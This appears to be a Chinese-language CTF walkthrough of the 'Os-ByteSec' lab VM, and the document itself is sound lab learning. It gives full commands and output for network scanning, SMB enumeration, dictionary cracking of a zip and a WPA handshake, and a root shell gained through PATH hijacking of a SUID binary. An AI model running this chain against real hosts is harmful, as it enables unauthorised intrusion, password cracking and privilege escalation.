Os-ByteSec

$ sudo nmap -sP 192.168.0.1/24

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00044s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.22s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.101
Host is up (0.20s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.00022s latency).
MAC Address: 08:00:27:EA:22:6D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.105
Host is up (0.20s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.20s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.109
Host is up (0.0011s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 5.89 seconds

-sP (Ping扫描)
该选项告诉Nmap仅仅 进行ping扫描 (主机发现)，然后打印出对扫描做出响应的那些主机。 没有进一步的测试 (如端口扫描或者操作系统探测)。 这比列表扫描更积极，常常用于 和列表扫描相同的目的。它可以得到些许目标网络的信息而不被特别注意到。 对于攻击者来说，了解多少主机正在运行比列表扫描提供的一列IP和主机名往往更有价值。

系统管理员往往也很喜欢这个选项。 它可以很方便地得出 网络上有多少机器正在运行或者监视服务器是否正常运行。常常有人称它为 地毯式ping，它比ping广播地址更可靠，因为许多主机对广播请求不响应。

-sP选项在默认情况下， 发送一个ICMP回声请求和一个TCP报文到80端口。如果非特权用户执行，就发送一个SYN报文 (用connect()系统调用)到目标机的80端口。 当特权用户扫描局域网上的目标机时，会发送ARP请求(-PR)， ，除非使用了--send-ip选项。 -sP选项可以和除-P0)之外的任何发现探测类型-P* 选项结合使用以达到更大的灵活性。 一旦使用了任何探测类型和端口选项，默认的探测(ACK和回应请求)就被覆盖了。 当防守严密的防火墙位于运行Nmap的源主机和目标网络之间时， 推荐使用那些高级选项。否则，当防火墙捕获并丢弃探测包或者响应包时，一些主机就不能被探测到。

$ nmap -sV -sC -A 192.168.0.102

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 06:31 CST
Nmap scan report for 192.168.0.102
Host is up (0.000056s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
|   256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_  256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -9h50m00s, deviation: 3h10m30s, median: -8h00m01s
| smb2-time: 
|   date: 2022-03-17T14:31:59
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: nitin
|   NetBIOS computer name: NITIN\x00
|   Domain name: 168.1.7
|   FQDN: nitin.168.1.7
|_  System time: 2022-03-17T20:01:59+05:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds

-sV (版本探测)
打开版本探测。 您也可以用-A同时打开操作系统探测和版本探测。
-sC　　根据端口识别的服务,调用默认脚本

    SMB（ServerMessage Block）通信协议是微软（Microsoft）和英特尔(Intel)在1987年制定的协议，主要是作为Microsoft网络的通讯协议。SMB 是在会话层（session layer）和表示层（presentation layer）以及小部分应用层（application layer）的协议。SMB使用了NetBIOS的应用程序接口 （Application Program Interface，简称API），一般端口使用为139，445。另外，它是一个开放性的协议，允许了协议扩展——使得它变得更大而且复杂；大约有65个最上层的作业，而每个作业都超过120个函数，甚至Windows NT也没有全部支持到，最近微软又把 SMB 改名为 CIFS（CommonInternet File System），并且加入了许多新的特色。
    SMB协议是一个很重要的协议，目前绝大多数的PC上都在运行这一协议，windows系统都充当着SMB协议的客户端和服务器，所以SMB是一个遵循客户机服务器模式的协议。SMB服务器负责通过网络提供可用的共享资源给SMB客户机，服务器和客户机之间通过TCP/IP协议、或者IPX协议、或者是NetBEUI进行连接。

    SMB是应用层(和表示层)协议，使用C/S架构，其工作的端口与其使用的协议有关。当远程连接计算机访问共享资源时有两种方式：
    ★共享计算机地址\共IP享资源路径
    ★共享计算机名\共享资源路径
    其中，使用计算机名访问时，SMB服务工作在NetBIOS协议之上，用的是TCP的139端口；使用IP地址访问时，用的是TCP的445端口。

$ smbmap -H 192.168.0.102

[+] Guest session   	IP: 192.168.0.103:445	Name: 192.168.0.103                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (nitin server (Samba, Ubuntu))

SMBMap允许用户枚举整个域中的samba共享驱动器。用户可以使用该工具列出共享驱动器、驱动器权限、共享内容、上传/下载功能、文件名自动下载模式匹配，甚至远程执行命令。该工具原本的设计初衷是为了简化在大型网络中搜索潜在敏感数据的过程。

$ ./enum4linux-ng.py -A -C 192.168.0.102  

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 192.168.0.102
[*] Username ......... ''
[*] Random Username .. 'agujhpgm'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Service Scan on 192.168.0.102    |
 =====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    NetBIOS Names and Workgroup for 192.168.0.102    |
 =====================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- NITIN           <00> -         B <ACTIVE>  Workstation Service
- NITIN           <03> -         B <ACTIVE>  Messenger Service
- NITIN           <20> -         B <ACTIVE>  File Server Service
- ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
- WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
- WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
- WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 ==========================================
|    SMB Dialect Check on 192.168.0.102    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: false

 ==========================================
|    RPC Session Check on 192.168.0.102    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[+] Server allows session using username 'agujhpgm', password ''
[H] Rerunning enumeration with user 'agujhpgm' might give more results

 ====================================================
|    Domain Information via RPC for 192.168.0.102    |
 ====================================================
[+] Domain: WORKGROUP
[+] SID: NULL SID
[+] Host is part of a workgroup (not a domain)

 ============================================================
|    Domain Information via SMB session for 192.168.0.102    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: NITIN
NetBIOS domain name: ''
DNS domain: 168.1.7
FQDN: nitin.168.1.7

 ================================================
|    OS Information via RPC for 192.168.0.102    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 4.3.11-Ubuntu)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: Windows 6.1
Native LAN manager: Samba 4.3.11-Ubuntu
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT nitin server (Samba, Ubuntu)

 ======================================
|    Users via RPC on 192.168.0.102    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 1 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 users via 'enumdomusers'
[+] After merging user results we have 1 users total:
'1000':
  username: smb
  name: ''
  acb: '0x00000010'
  description: ''

 =======================================
|    Groups via RPC on 192.168.0.102    |
 =======================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 =========================================
|    Services via RPC on 192.168.0.102    |
 =========================================
[+] Found 4 service(s):
NETLOGON:
  description: Net Logon
RemoteRegistry:
  description: Remote Registry Service
Spooler:
  description: Print Spooler
WINS:
  description: Windows Internet Name Service (WINS)

 =======================================
|    Shares via RPC on 192.168.0.102    |
 =======================================
[*] Enumerating shares
[+] Found 2 share(s):
IPC$:
  comment: IPC Service (nitin server (Samba, Ubuntu))
  type: IPC
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A

 ==========================================
|    Policies via RPC for 192.168.0.102    |
 ==========================================
[*] Trying port 445/tcp
[+] Found policy:
domain_password_information:
  pw_history_length: None
  min_pw_length: 5
  min_pw_age: none
  max_pw_age: not set
  pw_properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
domain_lockout_information:
  lockout_observation_window: 30 minutes
  lockout_duration: 30 minutes
  lockout_threshold: None
domain_logoff_information:
  force_logoff_time: not set

 ==========================================
|    Printers via RPC for 192.168.0.102    |
 ==========================================
[+] No printers returned (this is not an error)

Completed after 0.48 seconds

Enum4linux是一个用于枚举来自Windows和Samba系统的信息的工具。 它试图提供与以前从www.bindview.com可用的enum.exe类似的功能。
它是用Perl编写的，基本上是一个包装Samba工具smbclient，rpclient，net和nmblookup。
工具的用法可以在下面找到例子，以前版本的工具可以在页面底部找到。
dnstracer用于获取给定主机名从给定域名服务器（DNS）的信息，并跟随DNS服务器链得到权威结果。

$ smbclient //192.168.0.102/smb -U smb

Enter WORKGROUP\smb's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Nov  4 19:50:37 2019
  ..                                  D        0  Mon Nov  4 19:37:28 2019
  main.txt                            N       10  Mon Nov  4 19:45:38 2019
  safe.zip                            N  3424907  Mon Nov  4 19:50:37 2019

  9204224 blocks of size 1024. 6825756 blocks available
smb: \> 

smbclient是客户端软件，是测试与Windows共享连接的有用工具。它可用于传输文件或查看共享名。此外，它具有“ tar”(备份)功能，可以将文件从服务器还原到客户端，反之亦然。我们枚举了目标计算机，并直接使用smbclient找到了guest共享。然后，我们连接到guest共享，发现一个名为file.txt的文本文件。我们可以使用get命令对该文件进行下载。

$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip 

[safe.zip] secret.jpg password: 
  inflating: secret.jpg              
  inflating: user.cap       

Fcrackzip是一款专门破解zip类型压缩文件密码的工具，工具小巧方便、破解速度快，能使用字典和指定字符集破解，适用于linux、mac osx 系统。

sudo aircrack-ng user.cap

Reading packets, please wait...
Opening user.cap
Read 49683 packets.

   #  BSSID              ESSID                     Encryption

   1  56:DC:1D:19:52:BC  blackjax                  WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening user.cap
Read 49683 packets.

1 potential targets

Please specify a dictionary (option -w).

$ sudo aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt  

Reading packets, please wait...
Opening user.cap
Read 49683 packets.

   #  BSSID              ESSID                     Encryption

   1  56:DC:1D:19:52:BC  blackjax                  WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening user.cap
Read 49683 packets.

1 potential targets



                               Aircrack-ng 1.6 

      [00:00:00] 1424/10303727 keys tested (18424.54 k/s) 

      Time left: 9 minutes, 19 seconds                           0.01%

                           KEY FOUND! [ snowflake ]


      Master Key     : 88 D4 8C 29 79 BF DF 88 B4 14 0F 5A F3 E8 FB FB 
                       59 95 91 7F ED 3E 93 DB 2A C9 BA FB EE 07 EA 62 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : ED B5 F7 D9 56 98 B0 5E 25 7D 86 08 C4 D4 02 3D 

$ find / -user root -perm -4000 -print 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说，这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们，然后将所有错误重定向到/dev/null，从而仅列出该用户具有访问权限的那些二进制文件。

$ cd /tmp
$ ls
systemd-private-250c4f6c088441de8cc92f48f42a5fb7-systemd-timesyncd.service-XfmVb5
$ echo "/bin/sh" > netstat
$ echo "/bin/sh" > netstat
$ chmod 777 netstat 
$ echo $PATH 
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
$ export PATH=/tmp:$PATH
$ cd /usr/bin 
$ ./netscan

# cat /root/root.txt
    ____  ____  ____  ______   ________    ___   ______
   / __ \/ __ \/ __ \/_  __/  / ____/ /   /   | / ____/
  / /_/ / / / / / / / / /    / /_  / /   / /| |/ / __  
 / _, _/ /_/ / /_/ / / /    / __/ / /___/ ___ / /_/ /  
/_/ |_|\____/\____/ /_/____/_/   /_____/_/  |_\____/   
                     /_____/                           
Conguratulation..

MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Author : Rahul Gehlaut

Contact : https://www.linkedin.com/in/rahulgehlaut/

WebSite : jameshacker.me